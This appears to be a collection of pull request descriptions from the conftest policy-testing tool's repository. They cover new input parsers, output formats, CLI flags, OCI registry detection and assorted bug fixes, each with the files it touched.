open-policy-agent/conftest

README.md

I'd prefer `${_/*\/}` but it's sufficiently indistinguishable from magic...

docs: version typo in installation instructions

---

acceptance.bats
go.mod
go.sum

Hi,
This PR fixes the problem described in #13.
OPA released some new keywords for rego and changed "var" to "some" in v0.12.0.
To use these keywords, we need to upgrade the Opa to the current version.
(https://github.com/open-policy-agent/opa/commit/3263f54a74242f2225d0d7520f401805970c86db)
I tested Conftest with current examples with v0.12.0 
Also, the new version of Opa has reduced output for trace, fixed the acceptance test for trace.

update opa to 0.12.0 for new keywords, fix acceptance for reduced output for trace

---

conftest.go
util/repository.go
util/repository_test.go

Closes #24 
This fixes the issue where `localhost:5000/test` is treated to include a
`tag` because the string includes a `:` in the ports.
Signed-off-by: Ken Fukuyama <kenfdev@gmail.com>
I've created a different file to test it easier but open to thoughts of how to implement this differently.
Thank you!

Fix decision for repositories including ports

---

acceptance.bats
conftest.go

Partly Fixes #26 
Added a flag so colorized output could be disabled to make it easier to parse the output in automation

feat: Add --no-color flag to disable colored output

---

README.md
acceptance.bats
examples/ini/grafana.ini
examples/ini/policy/deny.rego
go.mod
go.sum
pkg/parser/ini/ini.go
pkg/parser/ini/ini_test.go
pkg/parser/ini/sample.ini
pkg/parser/parser.go

This PR implements `ini` support to Conftest requested in #45.
I put `grafana.ini` to `examples/ini` folder. Added some tests to the policy that ensures Grafana installed and configured correctly.

add ini support

---

pkg/commands/test/test.go

In its current form - a lot of the `test` code treats messages (`warn` and `fail`) produced by the `rego` check process as "first class" go errors. This results in some confusion and tangling of dependancies when having to guard against and handle other types of errors, which could come from failing to open a file or downstream errors thrown by the rego compiler itself.
This patch proposes refactoring the return type of many internal methods to be of `(checkResult, error)` to make this behavior more explicit. I'm very open to different names or another approach if other maintainers think that would be best!

refactor error handling

---

.circleci/config.yml
Makefile

Pull requests are now tested in CI, but credentials are not exposed to pull requests, so the Snyk jobs need to run only on master.

Split ci config

---

go.mod
pkg/commands/test/output.go
pkg/commands/test/output_test.go
pkg/commands/test/test.go
pkg/commands/test/test_test.go

Creates a new abstraction - `outputManager` which provides a standard interface for recording results from a `conftest` evaluation. For now we simply emulate the standard behavior with a "streaming stdout" sink. This will be expanded upon in later patches to allow multiple types of test output (json, xml etc..).
Related to: https://github.com/instrumenta/conftest/issues/42

creates foundation for configurable output formats

---

README.md
acceptance.bats
pkg/commands/test/output.go
pkg/commands/test/output_test.go

The previous output suffers from a few issues:
1. You need to read multiple lines to determine the issue and it's
location
2. Without the colors you can't tell errors from warnings
3. It's not easily parsable
This adjusts things according to the discussion in https://github.com/instrumenta/conftest/issues/42

Improve the default output

---

go.mod
go.sum
pkg/commands/test/output.go
pkg/commands/test/output_test.go
pkg/commands/test/test.go

Adds a new type - `jsonOutputManager` which formats the results of a `ccheck` run as JSON. 
The format of the output is as follows: 
```bash
[
{
"filename": "examples/kubernetes/service.yaml",
"warnings": null,
"failures": [
"first failure"
]
},
{
"filename": "examples/kubernetes/deployment.yaml",
"warnings": [
"first warning"
],
"failures": [
"first failure",
"second failure",
]
}
]
```
Example:
```bash
⇒  ./conftest test -p examples/kubernetes/policy examples/kubernetes/service.yaml
[
{
"filename": "examples/kubernetes/service.yaml",
"warnings": [
"Found service hello-kubernetes but services are not allowed"
],
"failures": null
}
]
⇒  ./conftest test -p examples/kubernetes/policy examples/kubernetes/deployment.yaml
[
{
"filename": "examples/kubernetes/deployment.yaml",
"warnings": null, …
```

adds json output manager

---

pkg/commands/test/output.go
pkg/commands/test/test.go

Adds a command line flag for controlling the output format of the `conftest test` command. For now we only support `stdout` but this will change once we add other output managers (json and xml are slated next!)
Example:
```bash
⇒  ./conftest test --help                           
Test your configuration files using Open Policy Agent
Usage:
conftest test <file> [file...] [flags]
Flags:
--fail-on-warn    return a non-zero exit code if only warnings are found
-h, --help            help for test
-o, --output string   output format for ccheck results - valid options are: [stdout]
--update          update any policies before running the tests
--version         version for test
```

add flag for controlling output format

---

pkg/commands/test/output.go
pkg/commands/test/test.go
pkg/policy/policy.go

Except for some errcheck findings related to viper that I believe are
commonly ignored:
$ golangci-lint run ./...
pkg/commands/commands.go:39:17: Error return value of `viper.BindPFlag` is not checked (errcheck)
viper.BindPFlag("policy", cmd.PersistentFlags().Lookup("policy"))
^
pkg/commands/commands.go:40:17: Error return value of `viper.BindPFlag` is not checked (errcheck)
viper.BindPFlag("debug", cmd.PersistentFlags().Lookup("debug"))
^
pkg/commands/commands.go:41:17: Error return value of `viper.BindPFlag` is not checked (errcheck)
viper.BindPFlag("trace", cmd.PersistentFlags().Lookup("trace"))
^
pkg/commands/commands.go:49:20: Error return value of `viper.ReadInConfig` is not checked (errcheck)
viper.ReadInConfig()
^
ℹ️ Looks like there's a hosted service as well, free for open …

fix lint issues reported by golangci-lint

---

acceptance.bats
pkg/commands/test/test.go
pkg/parser/input.go
pkg/parser/input_test.go
pkg/parser/parser.go

Fixes: #69 
This PR adds `--input` flag for using Conftest with stdin or unknown file extensions. 
By default, `--input` flag is the empty string, detection of input type is done with file extensions,
If we pass an input type, it enforces to use with given type.
Example test commands :
```
cat examples/ini/grafana.ini | ./conftest test -p examples/ini/policy/ --input=ini -
cat examples/traefik/traefik.toml | ./conftest test -p examples/traefik/policy/ --input toml -
```

add input flag for parsing the stdin stream

---

pkg/commands/push/push.go

Originally found in #71 
Running (on windows)
`conftest push localhost:5000/policies:latest`
Results in
`time="2019-08-10T11:47:27-04:00" level=fatal msg="policy\\base_test.rego: dirty path"`
This error actually originates from oras
https://github.com/deislabs/oras/blob/master/pkg/oras/push_opts.go#L85

Normalize file path

---

examples/ci/gitlab/kubernetes.yaml
examples/ci/gitlab/terraform.yaml

This PR adds a new CI folder to the examples dir and includes 2 examples of using conftest (terraform and k8s) with Gitlab CI. Happy to make any changes if needed.
Thanks for making conftest, it's fantastic :)

added ci examples dir with gitlab ci examples

---

acceptance.bats
examples/hcl2/policy/deny.rego
examples/hcl2/terraform.tf
go.mod
pkg/parser/hcl2/convert.go
pkg/parser/hcl2/convert_test.go
pkg/parser/hcl2/hcl2.go
pkg/parser/parser.go

Fixes #78.
The hcl2 input can be used with `-i hcl2` flag. 
The issues with hcl2 to JSON is still discussed in https://github.com/hashicorp/hcl2/issues/44 so there is no exact way to transform it into structured data for now.
That's why the original `.tf` the extension should use with classic `hcl` parser.
https://github.com/tmccombs/hcl2json 's files are used, simplified and referenced to the original repo. 
The translation can be refactored in the future, however, for now, it's enough for writing tests against `hcl2`.
The example of Terraform 0.12 input copied from https://www.hashicorp.com/blog/announcing-terraform-0-12

add hcl2 support

---

README.md
pkg/parser/hcl2/hcl2.go

Documented `-i` aka `--input` flag.
New examples added.
Removed unnecessary `FileName` param.

docs: document the input flag, add new examples

---

acceptance.bats
pkg/commands/test/test.go

According to the docs,
expected:
```console
$ cat deployment.yaml | conftest test -
FAIL - Containers must not run as root
FAIL - Deployments are not allowed
```
got:
```console
$ cat deployment.yaml | conftest test -  # or cat examples/kubernetes/deployment.yaml  | ./conftest test -p examples/kubernetes/policy/ -
(nothing, also the err msg: "You must define an input type to read from stdin" is not printed )
```
Fixed the default stdin behavior to `yaml` as documented.
Fixed the `err` printing problem.

bugfix : default stdin behavior is fixed to yaml, change log prints to errorf

---

README.md
acceptance.bats
pkg/commands/test/test.go
pkg/commands/test/test_test.go

I think in hindsight the combine flag can be shorter. The extra hyphen
and config part are lots to type for limited extra value. The test
command isn't test-config for example
What do folks think?
cc. @Salamandastron1

Shorten combine-config flag to combine

---

acceptance.bats
pkg/commands/test/test.go

Resolves #108 
The check for failures moved outside the loop for files, which means that the exit code currently is only correct if the last file contains errors, not if earlier files contain errors but the last file doesn't.

Fix incorrect exit code

---

pkg/commands/test/test.go
pkg/commands/test/test_test.go
pkg/commands/verify/verify.go
pkg/policy/compiler.go

A fix of sorts for the issue reported in #114. I'm a golang newbie, so this might not be the best way of attacking this problem but it has yielded the results that I'm after (not loading the `*_test.rego` files when running a `conftest test`).

Don't always load _test.rego files in recursivelySearchDirForRegoFiles

---

acceptance.bats
examples/nested/data.json
examples/nested/policy/group1/main.rego
examples/nested/policy/group2/main.rego
pkg/policy/compiler.go

This resolves #117 where duplicate file names overwrite each others policies.

Use relative path on compiling policies

---

README.md

small fix in docs, document out `parse` command

docs: document out parse command, fix correct path for parsers

---

commands/commands.go
commands/pull/pull.go
commands/pull/pull_test.go
commands/test/test.go
commands/update/update.go
policy/policy.go

Currently the `Download` method requires `viper` to resolve where to download the policies to. From a library standpoint, viper shouldn't really be in the mix, but rather give the consumer the ability to choose where to put their policies.

Remove viper dependency on Download

---

examples/kubernetes/policy/base_test.rego
examples/kubernetes/policy/deny.rego

If a property doesn't exist on the `input` for Rego, the result is undefined. This cascades into sprintf() being undefined, into msg being undefined, making the policy never be able to fail.
This fixes up our example a little bit

Fix kubernetes policy example

---

commands/test/output.go
commands/test/output_test.go

Currently one of the keys `filename` is lowercase, the others are
Leading caps. This inconsistency makes working with the output harder,
as generators often assume some consistency, at least without
configuration.
Typically, JSON keys are snake_case or camelCase in my experience.
Especially outside Go, I don't think I ever see Uppercase key name.
The Google styleguide for instance recommends camelCase names:
https://google.github.io/styleguide/jsoncstyleguide.xml
This change makes all key names lowercase, which I think is a good
default. This breaks for anyone relying on the key names being
inconsistent today, but better to break today with fewer users than an
inconsistent API later with more users in my experience.

Lowercase keys in JSON output

---

Dockerfile

This is required (and documented) when running conftest using Docker run
in order to have an explicit default to detect the mounted policy folder.

Add explicit WORKDIR to Docker image

---

acceptance.bats
commands/test/test.go

Currently when a blank filename is passed to conftest, for example with
`conftest test ""` we try and open blank and fail with an odd error.
This change means we ignore explicit blank files passed in.
This hit me with the GitHub Action, due to the variadic nature of
passing files to conftest. GitHub Actions doesn't have a good optional
argument pattern, and passes "" explicitly. This change hits an edge
case for typical usage, but opens up the ability for the Action to take
arbitrary arguments.

Handle explicitly blank filenames passed into conftest

---

commands/test/test.go
parser/cue/cue.go
parser/cue/cue_test.go
parser/docker/docker.go
parser/hcl2/hcl2.go
parser/ini/ini.go
parser/parser.go
parser/parser_test.go
parser/terraform/terraform.go
parser/toml/toml.go
parser/yaml/yaml.go

Just a little cleanup task I've been meaning to put together. Noticed that we're using the `yaml` package in most of our parsers for Unmarshal, but json makes more sense as we're initially marshalling into json.

Remove yaml unmarshalling

---

commands/parse/parse.go
commands/parse/parse_test.go
commands/test/test.go
parser/config.go

Currently, we are calling `GetConfigurations()` in `parse` and `test` command both. (`test` command owns that. I dunno why?)
The dependency on `viper` in this function, cause us passing input flag in test which does not look like a good pattern like in `parse_test.go`
```go
viper.Reset()
viper.Set("input", testunit.input)
....
viper.Reset()
```
Rather than calling functions between subcommands, it would be better we place it in the `parser` package because it more looks like it is a part of the parsing process.
This PR:
- removes `viper` dependencies from `parser_test.go`.
- moves file configs and functions to inside `parser` package.
For the next step, we can write tests against `config.go`.

migrate GetConfigurations() to parser package

---

commands/test/test.go

* Rename `res` to `rules` 
it looks more natural because the function name is getRules
* https://github.com/instrumenta/conftest/pull/161

Rename res to rules

---

.goreleaser.yml
internal/commands/default.go
internal/commands/output.go
internal/commands/output_test.go
internal/commands/parse.go
internal/commands/parse_test.go
internal/commands/pull.go
internal/commands/pull_test.go
internal/commands/push.go
internal/commands/test.go
internal/commands/test_test.go
internal/commands/update.go
internal/commands/verify.go
main.go

Now that the commands no longer have specific `testdata` folders, we can move all of the commands to `internal`.

Move commands to internal

---

acceptance.bats
internal/commands/output.go
internal/commands/test.go
internal/commands/verify.go

As per #111, I have enabled the `--trace` flag on the `verify` command.
Some of the major changes include the type `type CheckResult struct`,
which may or may not be to everyone's taste so happy to amend them on
feedback.

conftest verify support `--trace` flag #111

---

acceptance.bats
examples/traefik/policy/base_test.rego
internal/commands/verify.go

On failure for `verify` command, it should return `1` status code.
Same way as `test` command.
* #165

 Add exit status control for verify failures

---

README.md
acceptance.bats
examples/edn/policy/deny.rego
examples/edn/sample_config.edn
go.mod
go.sum
parser/edn/edn.go
parser/edn/edn_test.go
parser/parser.go
parser/parser_test.go

Solves #2.
As requested by @garethr, this PR enables support for
[EDN](https://github.com/edn-format/edn) files as an input.
This PR touches on a number of things:
* It creates a new parser for edn files (parser/edn/...) and its tests
* Extends the parser interface to include the newly created edn parser
(and it tests it)
* Updades go mod and sum with the edn dependencies
* Creates examples policies and sample config files for EDN
* Updates acceptance tests to include the parsin of EDN files
* Updates the README

Support EDN input

---

parser/cue/cue_test.go
parser/docker/docker_test.go
parser/edn/edn_test.go
parser/ini/ini_test.go
parser/parser_test.go
parser/terraform/terraform_test.go
parser/yaml/yaml_test.go

It solves #171.
Firstly, I have looked for all two line handling errs (where there was a single return) and combined that as per the issue spec.
Secondly, I have also looked for all fmt strings where they started with a capital letter and changed that.
Lastly, I search for occurrences of 'we' within return strings and "impersonalised" them.

Consistent handling of errors and case in parsers

---

acceptance.bats
internal/commands/test.go
internal/commands/test_test.go

* Add `Success` output
The example is here.
```
$ go run main.go test  my-file.hcl -p my-policy.rego -i hcl2
PASS - my-file.hcl - data.main.warn
PASS - my-file.hcl - data.main.deny
```
JSON output.
```
[
{
"filename": "my-file.hcl",
"warnings": [],
"failures": [],
"successes": [
"data.main.warn",
"data.main.deny"
]
}
]
```
For https://github.com/instrumenta/conftest/issues/141
To improve feedback.
In current implementation there were no success output. 
Moreover, if all policy passes it will return almost empty output. This below is JSON output.
```
$ go run main.go test -o json my-file.hcl -p my-policy.rego -i hcl2
[
{
"filename": "my-file.hcl",
"warnings": [],
"failures": [],
"successes": []
}
]
```

Add successes output

---

acceptance.bats
internal/commands/output.go
internal/commands/output_test.go

@boranx, @Blokje5 , as per my comment in #183, this PR solves the issue.
It includes traces in the output of the `test -o json` command, and the `test -o tap` command, as well as acceptance tests for both cases.

Fixed issue with json and tap output formats without trace

---

go.sum
internal/commands/output.go
internal/commands/output_test.go
internal/commands/test.go
internal/commands/verify.go

This PR solves #186.
To do so, I extended the type `checkResult` and every member of it (failures, warnings and successes) is not of the newly created type `result`:
```
// Result describes the result of a single rule evaluation.
type Result struct {
Message error
Traces  []error
}
// CheckResult describes the result of a conftest evaluation.
// warning and failure "errors" produced by rego should be considered separate
// from other classes of exceptions.
type CheckResult struct {
FileName  string
Warnings  []Result
Failures  []Result
Successes []Result
}
```
This way, if traces are enabled we can capture them individually for each rule, and flush them out accordingly so the feedback is clearer and debugging your rules simpler.
In order to make it as straightforward as possible, I have …

Embedding traces in each one of the results

---

acceptance.bats

Working with conftest today I've realised that we were missing the acceptance test for `--trace` with `table` output. This PR addresses that.

Added missing acceptance test for command trace with table output

---

acceptance.bats
internal/commands/verify.go
policy/policy.go

When you pass file path with no policies, it will return an error message and it will exit with status `1`.
```
$ confest verify -p /no/policy/path/
Error: running verification: no policies found in /no/policy/path/
Usage:
conftest verify [flags]
Flags:
-h, --help            help for verify
-o, --output string   output format for conftest results - valid options are: [stdout json tap]
--trace           enable more verbose trace output for rego queries
Global Flags:
--no-color        disable color when printing
-p, --policy string   path to the Rego policy files directory. For the test command, specifying a specific .rego file is allowed. (default "policy")
exit status 1
```
Same as `test` command.
* https://github.com/instrumenta/conftest/issues/141
* Without this feature, the output is …

 Add feedback on invalid policy path

---

acceptance.bats

Regarding the test: `Test command with table output and trace flag`
I expect both outputs for `table` and `trace` if both `trace` and `table` option is enabled.

fix test: run exactly against trace option with table

---

internal/commands/test.go

* Nits: Fail fast when GetConfigurations fail.
* Refactoring...
* Failing fast is better.
* Readability(these two lines got closer)
```golang
if len(nonBlankFileList) < 1 {
return fmt.Errorf("no file specified")
}
```
```golang
configurations, err := parser.GetConfigurations(ctx, viper.GetString("input"), nonBlankFileList)
if err != nil {
return fmt.Errorf("get configurations: %w", err)
}
```

Fail fast when getting configurations fails

---

policy/policy.go

* Add empty policy file detection
* OPA compiler will crash(=panic)
* #204

Add empty policy file detection

---

README.md
acceptance.bats
examples/multitype/deployment.yaml
examples/multitype/grafana.ini
examples/multitype/policy/base.rego
examples/multitype/policy/grafana.rego
examples/multitype/policy/kubernetes.rego
parser/config.go
parser/config_test.go

This pr implements multiple input type. For example, 
```
$ conftest test config.yml traefik.toml gke.tf -p /path/to/my/common/policy.rego
```
* Address https://github.com/instrumenta/conftest/issues/158
* In organizations, there are rules that don't depend on the file type.
* For better policy abstraction, I thought multiple input type will be great.
* Before now, if you pass multiple inputs, it will try to parse with the parser associated with the first filetype as reported in the issue.

Add multi input file type support

---

parser/toml/toml_test.go

* Add TOML parser test
TOML parser was missing unit tests.  Other parsers all have unit tests.

Add toml parser test

---

parser/hcl2/hcl2.go

It gives us more verbose compile errors for `hcl2`
Test it with invalid `hcl2` configs:
```shell
./conftest parse examples/edn/sample_config.edn -i hcl2
Error: failed during parser process: calling the parser method: bulk unmarshal: parser unmarshal: parse hcl2 config:
[:1,1-2: Invalid character; The ";" character is not valid. Use newlines to separate arguments and blocks, and commas to separate items in collection values.
:27,43-44: Invalid character; Single quotes are not valid. Use double quotes (") to enclose strings.
:44,75-76: Invalid character; Single quotes are not valid. Use double quotes (") to enclose strings.
:1,1-2: Argument or block definition required; An argument or block definition is required here.
]
```

print each of diagnostics

---

README.md

- As [evidenced by the formula](https://github.com/instrumenta/homebrew-instrumenta/blob/master/Formula/conftest.rb#L11), this software also works with Homebrew on Linux.
Thanks!

README: Homebrew is not macOS-only anymore

---

examples/ini/policy/deny.rego
parser/ini/ini.go
parser/ini/ini_test.go

* Added type for input literal
* To address #206 
* Like other parsers, INI should pass values in `boolean`, `number`(int, float), `string` too.

Add types for ini

---

README.md
internal/commands/test_test.go
parser/parser.go
policy/detect_oci.go
policy/detect_oci_test.go
policy/get_oci.go

- Ensure that 127.0.0.1:5000 is treated as an OCI registry by default to keep conftest backwards compatible.
127.0.0.1:5000 is most likely a local docker registry. We can use the detect mechanism of go-getter to ensure that url is picked up as an OCI registry as well. Localhost could be included, but that sadly does not work due to the call to url.Parse before the detectors. `localhost:` fits the scheme regex. 
- Tag supplied OCI registry urls with latest if no tag was supplied. This is a QoL change I thought was nice as well.
- Update README to make it a bit clearer what is and isn't treated as an OCI registry
Fixes #218

Fix/Improve behaviour of OCI registry detection in conftest pull

---

internal/commands/parse.go
internal/commands/pull.go
internal/commands/push.go
internal/commands/test.go
internal/commands/verify.go

The aim is to provide some guidenance for users of the conftest command without having to fall back to the README.
Several of the most common flags have been documented, along with their behaviour.

Improve documentation for conftest commands

---

internal/commands/verify.go

When running `conftest verify`, the path that is printed out for the policy has the policy path in it twice:
Before:
```
PASS - policy/policy/my_policy/my_test.rego
```
After:
```
PASS - policy/my_policy/my_test.rego
```

Don't join the policy path with the policy file name

---

internal/commands/push.go

chore, fix: #227, document the second arg for `push` command

Push specific directory readme

---

internal/commands/test.go
internal/commands/test_test.go

Deny and query name supports only alphabet now.
In this PR, add numerics support as query name for improving readability.
For example, validating `spec.replicas` is at least 3 in `deployment.yaml` of kubernetes  
```
deny_less_than_3_replicas[msg] {
input.spec.replicas < 3
msg = "spec.replicas is at least 3"
}
```

Support numerics as query name for improving readability

---

internal/commands/output.go
internal/commands/output_test.go

`conftest test` command can input multiple files and output for them.
(executed in `examples/kubernetes`)
```bash
conftest test service.yaml deployment.yaml
PASS - deployment.yaml - data.main.warn
FAIL - deployment.yaml - Containers must not run as root in Deployment hello-kubernetes
FAIL - deployment.yaml - Deployment hello-kubernetes must provide app/release labels for pod selectors
FAIL - deployment.yaml - hello-kubernetes must include Kubernetes recommended labels: https://kubernetes.io/docs/concepts/overview/working-with-objects/common-labels/#labels
PASS - service.yaml - data.main.deny
WARN - service.yaml - Found service hello-kubernetes but services are not allowed
```
However `jsonOutputManager` is not support multiple files.
```bash
conftest test service.yaml deployment.yaml -o …
```

jsonOutputManager supports multiple files

---

README.md
acceptance.bats
examples/hcl2/policy/deny.rego
examples/hcl2/policy/deny_test.rego
examples/hcl2/terraform.tf
parser/hcl2/convert.go
parser/hcl2/convert_test.go

In hindsight, concating the names of the resources made writing generic
tests much harder. This change makes for more verbose output, but easier
tests.
This is a breaking change, but at this stage (ie. pre 1.0) I think
maintaining this behaviour isn't worthwhile.
Fixes #235

Change the HCL2 parser to output more structure

---

internal/commands/test.go

Reserve the long output for when folks explicitly request help on the
test subcommand. Otherwise this main running conftest without input very
verbose.
Fixes #237

Show short help message for test output

---

.gitignore
plugin/cache.go
plugin/download.go
plugin/plugin.go
plugin/plugin_test.go

`TestPlugin_Exec` was failing on Windows due to character escape shenanigans. 
This just simplifies the `echo` command to be `echo hello`

Fix plugin test on Windows

---

acceptance.bats

Noticed when running the acceptance tests on local that a `deny.rego` file was being created.
This just cleans that up after the test run.

Remove test policy after test run

---

go.mod
go.sum

**What**
Upgrading the OPA versions in use.
**Why**
We were using a release that was dating on 18 Nov 2019, and a number of improvements have been made upstream ever since which we could benefit of.

Upgrading the OPA version in use

---

examples/hcl2/policy/deny.rego
parser/hcl2/convert.go

Fix #249 
the output for the given input will be like that (which is what it should be)
```JSON
{
"module": {
"project_factory": {
"labels": {
"env": "dev"
},
"name": "${var.project_name}",
"source": "terraform-google-modules/project-factory/google",
"version": "~\u003e 6.0"
}
},
"variable": {
"project_name": {
"type": "${string}"
}
}
}
```

parse hcl2 correctly

---

internal/commands/load_plugins.go

The plugin variable was always the latest loaded plugin when having multiple plugins installed. 
See: https://github.com/golang/go/wiki/CommonMistakes for more details

fix: Ensure that the correct plugin is loaded

---

acceptance.bats
examples/kubernetes/policy/labels.rego
internal/commands/output.go
internal/commands/output_test.go
internal/commands/test.go

This PR takes a shot at #246 and a bit of #141 in the sense that when no policies are found, you'll be notified in the console.
The primary change here is leveraging the `.Flush()` method on the Standard Output manager. This gives us the entire picture (all files, checks, etc) before outputting to the console.
I've attached some before/afters for your convenience:
(test command with single file)
(test command with multiple files)
(verify command with no failing policies)
(verify command with two failing policies)
(no policies found)
The PASS/FAIL look and feel was taken from how OPA displays their results. Thought the synergy made sense.
Feedback appreciated

Consolidate PASS output and notify when no policies found

---

internal/commands/output.go
internal/commands/output_test.go
internal/commands/test.go
internal/commands/verify.go

**What**
Making the `output.go` and its tests "spf13/viper"-agnostic, and abstract dealing with user input in the command files.
**Why**
Consistency.
Working with conftest the other day, I realised that our `output.go` was not "spf13/viper"-agnostic, and was pulling some information from arguments that I believe should have handled by its caller (in this case, the command `test.go`).

Made output.go viper-agnostic

---

.dockerignore
Dockerfile

The Docker build is failing on local, but runs fine in CircleCI. This makes it so that the builder/test/acceptance stages all use the `base` layer for consistency and gets the plugin test passing.

Fix Docker acceptance test

---

acceptance.bats
examples/terraform/gke.tf
internal/commands/output.go
internal/commands/test.go
parser/config.go
parser/config_test.go
parser/parser.go
parser/parser_test.go

Resolves https://github.com/instrumenta/conftest/issues/260
**NOTE: This does include a breaking change (for tf and hcl files)**
This pull request adds support for running `conftest` against directories.
The biggest pain point I had was with `HCL` vs `HCL2` with `.TF` files. There's no real good way, as far as I'm aware, to pragmatically figure out which HCL flavor is in use. It's possible for `HCL` syntax to parse successfully as `HCL2`, but have the policies fail because of slight differences.
That said, `HCL` is on its way out and being sunsetted.
In short, I made it so that if a `.tf` or `.hcl` file is found, use the `HCL2` parser by default, rather than the `HCL1` parser. You can still use the `HCL1` parser by including `-i hcl1`.
This was mostly due to the fact that I believe this …

Directory support

---

acceptance.bats
examples/docker/Dockerfile
examples/docker/policy/commands.rego
internal/commands/test.go
internal/commands/test_test.go
policy/namespace.go

As per #236, this PR introduces a new flag to make conftest search all namespaces available in the policies and find "deny.*" and "warn.* rules within.
I have created a new test for it in the Docker examples.

Introduce --all-namespaces flag #236

---

internal/commands/test.go
internal/commands/test_test.go
parser/config.go
parser/parser.go
parser/parser_test.go

This feels like a better layout, but feedback welcomed.
Working through some PRs relating to `-i` I noticed that `input` was driving a lot of behavior and causing a lot of branching. It is/was starting to bleed everywhere.
For example, input was a parameter in 3 different functions, but was not used in any of them except to make a call at the very end of the chain:
`GetConfigurations` -> `BulkUnmarshal` -> `getFileType` .. ultimately just to use it to call `GetParser`
So this lifts `input` much closer to the top, and associates the `Parser` with a `ConfigDoc`.
This PR also removes a lot of the `compiler` and `store` params that were repeated quite often into a single `TestRun` struct.

Reduce input variable footprint

---

README.md
acceptance.bats
docs/index.md
go.sum
internal/commands/output.go
internal/commands/output_test.go

The previous output repeated information and took up quite a bit of
vertical space. It also had a fixed width line which didn't adjust to
the console size.
This streamlines it, adding a touch of colour to call attention to
failures. Inspired by rspec.
Fixes #281

Modified the results summary UI

---

parser/hcl2/convert_test.go

Relates to: #266 
I added a few more tests in the hcl parser for the `provider` block. The existing behavior when you've got a single provider is to have it as a collection vs two providers of the same type (`aws` as an example) with `aliases` you get a set of collections.
Regardless of the solution to #266 I think its worthwhile to have tests for the specific differences since this is specific only to the provider block in hcl. This isnt possible with other resources due to conflicting namespace.

Adding additional tests for hcl parser

---

docs/index.md

There were two C's but there is supposed to be one.

Fix small index typo

---

acceptance.bats
internal/commands/test.go

This PR fixes the issue #275 raised by @corrupt952.
The root cause of the issue was the nature of contest rules: they tend to all be called the same (warn, deny, violation - despite the regex allowing for a broader range). This, resulted in all of the rules with the same name from the same package to be accounted for once if they passed (wrong behaviour), or individually if they failed.
Before the change:
```
$ ./conftest test -p examples/kubernetes/policy examples/kubernetes/service.yaml --no-color
WARN - examples/kubernetes/service.yaml - Found service hello-kubernetes but services are not allowed
3 tests, 2 passed, 1 warning, 0 failures
```
After the change:
```
$ go run . test -p examples/kubernetes/policy examples/kubernetes/service.yaml --no-color
WARN - …
```

Fix: incorrect total number of results

---

.circleci/config.yml

This requires an org admin to enable usage. We can bring back later but
I don't want to block the move and merging the other changes.

Remove third party orb for the moment

---

docs/options.md
internal/commands/test.go
internal/commands/test_test.go

Fixes: #310 
Example usage:
```shell
./conftest test -p examples/test/ test/ --ignore="parent/"
./conftest test -p examples/test/ test/ --ignore="child/"
./conftest test -p examples/test/ test/ --ignore=".*.yaml"
```

feat(test): add ignore flag for filtering unwanted inputs

---

acceptance.bats
examples/awssam/policy/policy.rego
examples/docker/policy/base.rego
examples/docker/policy/commands.rego
examples/hcl1/policy/base.rego
examples/traefik/policy/base.rego

I feel Conftest should try to set a good example by using better terminology where possible, especially given recent events. Additionally, given the fact that we already specifically look for "deny" rules to know which to process, this keeps our terminology consistent.

Update examples to use denylist

---

README.md

Moving the site over to the new repository caused the old badge to
break.

Fix badge for Netlify docs deploy

---

internal/commands/pull.go

Fix typo in help message

---

go.mod
go.sum
internal/commands/output.go
internal/commands/output_test.go

I discovered this project through the presentation that @garethr did for HashiConf Digital and I have to say, that this looks really great, it looks like this is the tool I've been looking for forever.
This PR adds support for JUnit which is especially useful as it's a format that GitLab is able to parse to display the result in a nice UI when browsing Pull Requests. I know there is some projects that can be used to convert TAP results to JUnit but I would like not having to ask each of my co-workers to install them.
The next feature I would love to see would be having the possibility to return a long description in addition to the message:
```
package main
deny[msg, description] {
input.kind = "Deployment"
not input.spec.template.spec.securityContext.runAsNonRoot = true
msg = "Containers …
```

Add support for JUnit

---

acceptance.bats
docs/examples.md
examples/jsonnet/arith.jsonnet
examples/jsonnet/policy/deny.rego
go.mod
go.sum
parser/jsonnet/jsonnet.go
parser/jsonnet/jsonnet_test.go
parser/parser.go

Add Jsonnet support like
```console
$ conftest test -p examples/jsonnet/policy examples/jsonnet/arith.jsonnet
```
Jsonnet(https://jsonnet.org/) is a data templating language similar to CUE but Jsonnet is not supported while CUE is supported.
Solves https://github.com/open-policy-agent/conftest/issues/180 .

Add support for Jsonnet input

---

internal/commands/pull.go

I've...
* removed extra new line&space in `conftest help` command
* removed `Google Cloud GCP`. Added `Google Cloud Storage` instead.
`Google Cloud GCP` is not exactly accurate because `GCP` stands for `Google Cloud Platform` so `Google Cloud GCP` will mean `Google Cloud Google Cloud Platform` which is not correct.
As I mentioned in #326 , GCP's GCR is one of OCI registries(ref: [Container image formats, Google Cloud](https://cloud.google.com/container-registry/docs/image-formats)). Therefore, we can remove it from the help message.
Signed-off-by: KeisukeYamashita <19yamashita15@gmail.com>

Fix "conftest pull" command's help message

---

downloader/detect_oci.go
downloader/detect_oci_test.go

As title. This PR is for adding GCR and ECR to OCI registory.
```console
$ conftest push gcr.io/<TEST_PROJECT>/keke-test:latest -p examples/kubernetes/policy
```
```console
$ go run ./main.go pull gcr.io/<TEST_PROJECT>/keke-test:latest
```
Solves https://github.com/open-policy-agent/conftest/issues/335.

Add GCR and ECR to OCI detector

---

internal/commands/push.go
policy/store.go

Something I noticed while looking at the push command: It would only load JSON files as data, not YAML, which is the current expected behaviour.

Fix an issue where push would only load json data

---

docs/index.md
mkdocs.yml

Also added a missing input format from v0.20.0

Exception docs are published but not linked in the nav

---

.goreleaser.yml
Dockerfile
docs/install.md

This change improves dockerfiles and allows to build conftest binaries for other architectures.

Dockerfile improvements, ARM64 binaries

---

downloader/detect_oci.go
downloader/detect_oci_test.go

Add GitLab registry support for OCI detector.
Developers are now doesn't need to add `oci://` for GitLab registries.
Solves: #349

Add GitLab registry to OCI detector

---

internal/commands/test.go

The msg of the successes was being constructed by the expr.Location.Text that is returned from the queries inside the Rego package. The message was expected to be empty and most of the time it was, for some random successes the message contained the location of the policy. Fixes #361 .

Ensure successes don't return a msg

---

contrib/plugins/kubectl-conftest.sh

Wanting to try `kubectl conftest` on my mac, I ran into a couple of errors that are fixed here. Changes:
1. Fix the single argument (resource type only) call to work on Mac OS. The xargs version there will silently discard arguments exceeding 255 bytes, which is pretty much any kubernetes resource. The replacement is tested on both OS X and Ubuntu 20.04.
2. Require conftest to be on path just as kubectl and don't expect it to be placed anywhere in particular. The previous check would also fail on Mac OS as the readline parameter '-f' is not available there.
